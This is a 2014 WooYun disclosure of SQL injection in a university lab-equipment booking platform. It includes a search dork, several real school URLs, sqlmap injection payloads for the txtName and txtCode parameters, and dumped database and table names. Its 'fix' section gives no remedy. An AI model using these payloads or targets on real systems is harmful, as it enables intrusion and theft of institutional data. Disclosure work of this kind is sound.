当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-062534

漏洞标题:某通用型教育学院仪器管理平台存在SQL注入

相关厂商:cncert国家互联网应急中心

漏洞作者:

提交时间:2014-05-28 12:59

修复时间:2014-08-26 13:00

公开时间:2014-08-26 13:00

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-05-28: 细节已通知厂商并且等待厂商处理中
2014-06-01: 厂商已经确认,细节仅向厂商公开
2014-06-04: 细节向第三方安全合作伙伴开放
2014-07-26: 细节向核心白帽子及相关领域专家公开
2014-08-05: 细节向普通白帽子公开
2014-08-15: 细节向实习白帽子公开
2014-08-26: 细节向公众公开

简要描述:

某通用型教育学院仪器管理平台存在SQL注入

详细说明:

1.厂商名称:南京先极科技有限公司
2.官网:http://www.changedu.com/
3.产品名称:大型仪器设备开放共享管理平台
4.官网展示该平台案例:

q1.jpg

q2.jpg

q3.jpg

q4.jpg

q5.jpg


google and baidu 搜索:大型仪器设备开放共享管理平台
或者inurl:ShowFiles/BookEquList.aspx
列举几例仅供cncert测试:
http://eq.njfu.edu.cn/ShowFiles/BookEquList.aspx?用户单位:南京林业大学
http://210.29.132.248/ShowFiles/BookEquList.aspx?用户单位:南京师范大学化学与材料科学学院
http://sjjx.njit.edu.cn/sy/share/ShowFiles/BookEquList.aspx?用户单位:南京工程学院
http://web168444.5udns.cn/ShowFiles/BookEquList.aspx?用户单位:也是南京师范的
http://ies.hhit.edu.cn/ShowFiles/BookEquList.aspx? 用户单位:淮海工学院
都是在预约列表-搜素仪器处

c1.jpg


c3.jpg


POST注入,漏洞文件:ShowFiles/BookEquList.aspx?(txtCode 仪器编号跟 txtName 仪器名称 参数都存在注入)
以南京林业大学为例:

c5.jpg

http://eq.njfu.edu.cn/ShowFiles/BookEquList.aspx
post数据:__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=&username=&txtCode=s&txtName=s&txtksdate=&txtjsdate=&ImageButton1.x=35&ImageButton1.y=14&txtye=


---
Place: POST
Parameter: txtName
Type: boolean-based blind
Title: Microsoft SQL Server/Sybase stacked conditional-error blind queries
Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=&username=&txtCode=s&tx
tName=s'; IF(5707=5707) SELECT 5707 ELSE DROP FUNCTION ZYzh--&txtksdate=&txtjsda
te=&ImageButton1.x=35&ImageButton1.y=14&txtye=
Type: UNION query
Title: Generic UNION query (NULL) - 77 columns
Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=&username=&txtCode=s&tx
tName=s' UNION ALL SELECT NULL,NULL,NULL,NULL,CHAR(113)+CHAR(105)+CHAR(99)+CHAR(
105)+CHAR(113)+CHAR(114)+CHAR(78)+CHAR(105)+CHAR(77)+CHAR(78)+CHAR(101)+CHAR(65)
+CHAR(115)+CHAR(98)+CHAR(76)+CHAR(113)+CHAR(101)+CHAR(109)+CHAR(105)+CHAR(113),N
ULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,N
ULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,N
ULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,N
ULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,N
ULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- &txtksdate=&txtjsdate=&ImageButton1.x=3
5&ImageButton1.y=14&txtye=
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=&username=&txtCode=s&tx
tName=s'; WAITFOR DELAY '0:0:5'--&txtksdate=&txtjsdate=&ImageButton1.x=35&ImageB
utton1.y=14&txtye=
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=&username=&txtCode=s&tx
tName=s' WAITFOR DELAY '0:0:5'--&txtksdate=&txtjsdate=&ImageButton1.x=35&ImageBu
tton1.y=14&txtye=
---
[16:14:54] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2000


available databases [13]:
[*] cs
[*] db_ldyl
[*] db_nldhxgc
[*] db_qcyy
[*] master
[*] model
[*] msdb
[*] NL_ArtDesign
[*] NL_LargeEquipment
[*] NL_TreeStatisticsData
[*] Northwind
[*] pubs
[*] tempdb


Database: NL_LargeEquipment
[59 tables]
+-------------------------+
| T_BookEquFund |
| T_BookRecord |
| T_BookRiZhi |
| T_CardUseLog |
| T_ChangeShuaKa |
| T_DsCardUseLog |
| T_EquipPrincipal |
| T_FMessage |
| T_FinanceSide |
| T_Log |
| T_LunWenImport |
| T_LunWenImport |
| T_News |
| T_Relation |
| T_RelationSubject |
| T_RelationSubjectSystem |
| T_RunningAccount |
| T_SMessage |
| T_XueYuan |
| T_Yqwx |
| T_ZhuanYe |
| dtproperties |
| shuaka_ip |
| sysconstraints |
| syssegments |
| t_ChangeRecord |
| t_DataDic |
| t_DicUserid |
| t_bigxk |
| t_bookEquipment |
| t_cyplan1 |
| t_cyplan1 |
| t_equipmentDetail |
| t_equipmentDetail |
| t_equipmentType |
| t_equstate |
| t_experiment |
| t_files |
| t_flag |
| t_folder |
| t_fujian |
| t_fyrecord |
| t_gzry |
| t_hourse |
| t_ip |
| t_lable |
| t_message |
| t_project |
| t_rulekf |
| t_test |
| t_user |
| t_user |
| t_xfrecord |
| t_xmyq |
| t_zone |
| v_RunningAccount |
| xi |
| xueyuan |
| zhuanye |
+-------------------------+

漏洞证明:

南京工程学院
http://sjjx.njit.edu.cn/sy/share/ShowFiles/BookEquList.aspx
post:__VIEWSTATE=%2FwEPDwUKLTMzNDAzNDE1Mg9kFgICAw9kFgQCBg8WAh4LXyFJdGVtQ291bnQCBRYKAgEPZBYCZg8VCAnkvZnlkI7nv5QSMjAxMy0zLTI1IDE3OjMwOjE5CDAwMDI2Njg0Kk1QU%2BaooeWdl%2BWMlueUn%2BS6p%2BWKoOW3peezu%2Be7n%2BaVmeWtpuiuvuWkhxAyMDEzLTAzLTExIDA5OjMwEDIwMTMtMDMtMTEgMTA6MzAJ546L5LqR5aKeDOetieW%2BheWuoeaguGQCAg9kFgJmDxUICeiWm%2BS6muWGmxEyMDEzLTMtMTEgOTozMDoxOQgwMDAyNjY4NCpNUFPmqKHlnZfljJbnlJ%2FkuqfliqDlt6Xns7vnu5%2FmlZnlraborr7lpIcQMjAxMy0wMy0xMyAwODozMBAyMDEzLTAzLTEzIDExOjMwAAzlrqHmoLjpgJrov4dkAgMPZBYCZg8VCAnnpZ3kuLnnpaUSMjAxMy0zLTI0IDEwOjMwOjE5CDAwMDI3MTA3KuWNmuS4luWKm%2BWjq%2BS5kOawlOWKqOaVmeWtpuWfueiureijhee9rkRTMxAyMDEzLTAzLTEwIDA5OjAwEDIwMTMtMDMtMTAgMTE6MDAJ546L5a6P5LyfDOetieW%2BheWuoeaguGQCBA9kFgJmDxUICeaIkOaZk%2BW9pBEyMDEzLTMtMjQgODozMDoxOQgwMDAyNjg2OC9GTVPmn5TmgKfmqKHlnZfljJbnlJ%2Fkuqfns7vnu58tLeacuuWZqOS6uuWNleWFgxAyMDEzLTAzLTI5IDA4OjAwEDIwMTMtMDMtMjkgMTA6MDAG6ZmI5YCpDOetieW%2BheWuoeaguGQCBQ9kFgJmDxUICeW8uuS7gemcnhEyMDEzLTMtMjIgODozMDoxOQgwMDAyNzAyNSrljZrkuJblipvlo6vkuZDmtrLljovmlZnlrabln7norq3oo4Xnva5EUzQQMjAxMy0wNC0wOCAxMDowMBAyMDEzLTA0LTA4IDEyOjAwCeWxheWbveaJjQznrYnlvoXlrqHmoLhkAgcPFgIeB1Zpc2libGVoFgJmD2QWAmYPZBYKAgcPDxYCHgRUZXh0BQExZGQCCQ8PFgQfAgUP56ys5LiA6aG1Jm5ic3A7HgdFbmFibGVkaGRkAgoPDxYEHwIFFSZuYnNwO%2BS4iuS4gOmhtSZuYnNwOx8DaGRkAgsPDxYCHwNoZGQCDQ8PFgIfA2hkZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAQUMSW1hZ2VCdXR0b24xrmuq2hIrjllOd073CzfiKLNhXLs%3D&username=&txtName=s&txtCode=&txtksdate=&txtjsdate=&ImageButton1.x=36&ImageButton1.y=11&__EVENTVALIDATION=%2FwEWBwK0%2BuTVBgKvpuq2CALEhISFCwLChPzDDQK1wNu3DwK1wM%2F8AQLSwpnTCBdnN9Rua7Hd0N4MHlER6%2F7tC6b2

available databases [11]:
[*] master
[*] model
[*] msdb
[*] ngc_jingsai
[*] NJGC_ChuangXin
[*] NJGC_lw
[*] NJGC_SY
[*] NJGC_Teach
[*] Northwind
[*] pubs
[*] tempdb


Database: NJGC_SY
[192 tables]
+-------------------------+
| T_Bg1 |
| T_Bg3 |
| T_Bg6 |
| T_BookRecord |
| T_BookRiZhi |
| T_ChangeShuaKa |
| T_ChangeShuaKakq |
| T_FMessage |
| T_HzOld1 |
| T_HzOld2 |
| T_HzOld3 |
| T_HzOld4 |
| T_HzOld5 |
| T_HzOld6 |
| T_HzOld7 |
| T_HzOld8 |
| T_JsRole |
| T_Log |
| T_News |
| T_PingJia |
| T_RenWuShu |
| T_SMessage |
| T_UserDetail |
| T_YhpCk |
| T_YhpRk |
| T_YihaoPing |
| T_Yqwx |
| T_YuSuan |
| T_ZhiBiao |
| T_change_kb |
| T_jwjh |
| T_jwjh20140113sun |
| T_kbjsvalue |
| T_ChangeShuaKakq(ceshi) |
| area |
| bigxkname |
| centuser |
| centuser2 |
| cssun |
| dtproperties |
| fjuser |
| kebiaorq |
| kebiaoxz |
| kebiaozc |
| province |
| shuaka_ip |
| smallxkname |
| sqlmapoutput |
| sys_DataDic |
| sys_privilege |
| sysconstraints |
| syssegments |
| t_ChangeRecord |
| t_ChangeRecordold |
| t_KeBiaoXMQz |
| t_bg2 |
| t_bg4 |
| t_bg7 |
| t_bg8 |
| t_bigxk |
| t_bookEquipment |
| t_canshu |
| t_changerecordjs |
| t_chengjiRate |
| t_class |
| t_course |
| t_coursexy |
| t_didian |
| t_drKbs |
| t_drkb |
| t_drkbxs |
| t_equipment |
| t_equipmentDetail |
| t_equipmentType |
| t_equipmentsb |
| t_equjxxx |
| t_experiment |
| t_fbxm |
| t_files |
| t_flag |
| t_folder |
| t_fyrecord |
| t_gj |
| t_hourse |
| t_jiaocai |
| t_jmyqdata |
| t_jmyqdatasb |
| t_jsxyid |
| t_kbfzjs |
| t_kbxs |
| t_kbxsvalue |
| t_kcchengji |
| t_kcsj |
| t_kcxkxsqr |
| t_kcxkxsqr2 |
| t_kebiao |
| t_kebiao_20140113sun |
| t_kebiaovalue |
| t_key |
| t_keyan |
| t_lable |
| t_lilun |
| t_links |
| t_message |
| t_procent |
| t_profj |
| t_project |
| t_projs |
| t_propc |
| t_rigisterUser |
| t_rulekf |
| t_ryqx |
| t_sbxm |
| t_sjbigxk |
| t_sjcgjl |
| t_sjdate |
| t_sjwhcd |
| t_sjzcdata |
| t_skyxtime |
| t_smallxk |
| t_sqsy |
| t_sqyyvalue |
| t_sybg |
| t_sycentlist |
| t_synews |
| t_sysjbqkdata |
| t_sysys |
| t_temp |
| t_user |
| t_userother |
| t_xfrecord |
| t_xk |
| t_xkxs |
| t_xmchengji |
| t_xmvalue |
| t_xmyq |
| t_xsinsertlab |
| t_xskbscore |
| t_xsteam |
| t_xsteam2 |
| t_xueqi |
| t_xwlujin |
| t_year |
| t_yhkxq |
| t_yqbx |
| t_yykbaddr |
| t_yyshiyan |
| t_yysyxs |
| t_ziyuan |
| t_zone |
| v_huizongRSS |
| v_huizong_4 |
| v_hzjob |
| v_jsskxylist |
| v_jsxyxslist |
| v_kbxslist |
| v_kebiao |
| v_message |
| v_messageddhf |
| v_messagejs |
| v_messagejsgxygly |
| v_messagelookhf |
| v_messagexs |
| v_sqxm |
| v_sysys |
| v_teacher |
| v_weekkcgs |
| v_xkxslist |
| v_xscjaddfind |
| v_xskblist |
| v_xsyqlist |
| v_xueji |
| v_xycourse |
| v_xyjiaocai |
| v_xyproject |
| v_xyziyuan |
| v_yqbx |
| v_yykbsjdd |
| v_yyshiyan |
| v_yysyShlist |
| v_yysylist |
| v_yysylistzt |
| workshuaka |
| xiti |
| xiti_xs |
| xkname |
| xueji |
| xueyuan |
| xxx |
| yuxi |
| yuxi_xsjg |
| zhuanye |
+-------------------------+

修复方案:

不知道是不是环境问题
有的post参数过长,我在Windows XP下的sqlmap运行会拒绝访问
但是删减一些又会提示错误,跑不出数据
linux下sqlmap应该不会有这个问题吧?

版权声明:转载请注明来源 @乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:14

确认时间:2014-06-01 23:04

厂商回复:

CNVD确认并复现所述情况,由CNVD协调教育网信息中心处置涉及学校网站,并通过公开渠道联系软件生产厂商南京先极科技有限公司通报处置。

最新状态:

暂无